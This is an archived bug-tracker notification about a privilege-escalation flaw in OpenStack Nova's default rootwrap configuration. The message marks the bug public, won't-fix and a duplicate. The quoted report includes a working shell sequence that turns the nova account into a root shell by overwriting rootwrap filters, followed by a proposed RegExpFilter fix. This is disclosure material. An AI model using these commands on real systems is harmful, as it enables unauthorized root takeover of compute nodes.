yahoo-eng-team team mailing list archive

Thread
Date
[Bug 2021966] Re: Possible privilege escalation with nova-rootwrap

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Jeremy Stanley <2021966@xxxxxxxxxxxxxxxxxx>
Date: Wed, 31 May 2023 18:58:20 -0000
Reply-to: Bug 2021966 <2021966@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
*** This bug is a duplicate of bug 1700501 ***
    https://bugs.launchpad.net/bugs/1700501

Thanks Dan. I've switched the bug report to public and set the security
advisory task to "won't fix" (indicating there are no plans to issue a
security advisory covering this topic).

I'll also set it as a duplicate of bug 1700501, but if anyone disagrees
then it's easy to split back out.

** Information type changed from Private Security to Public

** Changed in: ossa
       Status: Incomplete => Won't Fix

** This bug has been marked a duplicate of bug 1700501
   Insecure rootwrap usage

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/2021966

Title:
  Possible privilege escalation with nova-rootwrap

Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  This issue is being treated as a potential security risk under
  embargo. Please do not make any public mention of embargoed
  (private) security vulnerabilities before their coordinated
  publication by the OpenStack Vulnerability Management Team in the
  form of an official OpenStack Security Advisory. This includes
  discussion of the bug or associated fixes in public forums such as
  mailing lists, code review systems and bug trackers. Please also
  avoid private disclosure to other individuals not already approved
  for access to this information, and provide this same reminder to
  those who are made aware of the issue prior to publication. All
  discussion should remain confined to this private bug report, and
  any proposed fixes should be added to the bug as attachments. This
  embargo shall not extend past 2023-08-29 and will be made
  public by or on that date even if no fix is identified.

  Default nova-rootwrap configuration (up to Stein) allows easy
  privilege escalation from user nova.

  Description:
  If attacker gains nova ssh key (for example from some backup), then can log into nova account on compute node via ssh and easly escalate privileges to root:

  [nova@compute ~]$ whoami
  nova
  [nova@compute ~]$ echo -e '[Filters]\nbash: CommandFilter, bash, root' > compute.filters
  [nova@compute ~]$ cat compute.filters
  [Filters]
  bash: CommandFilter, bash, root
  [nova@compute ~]$
  [nova@compute ~]$ sudo /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf cp /var/lib/nova/compute.filters /etc/nova/rootwrap.d/compute.filters
  [nova@compute ~]$
  [nova@compute ~]$ sudo /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf bash
  root@compute:~#
  root@compute:~# whoami
  root

  Similar bug was reported some time ago:
  https://bugs.launchpad.net/nova/+bug/1700501, but wasn't considered as
  a real security risk (only local nova account login was discussed, not
  remote connection).

  Possible solution:
  As number of 'write' commands executed as root is low, and used only in few places in code, some limitations could be added. Simple example for command 'cp', with '/var/lib/nova/' as state_path:

  cp: RegExpFilter, cp, root, cp, /var/lib/nova/.*, /var/lib/nova/.*

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2021966/+subscriptions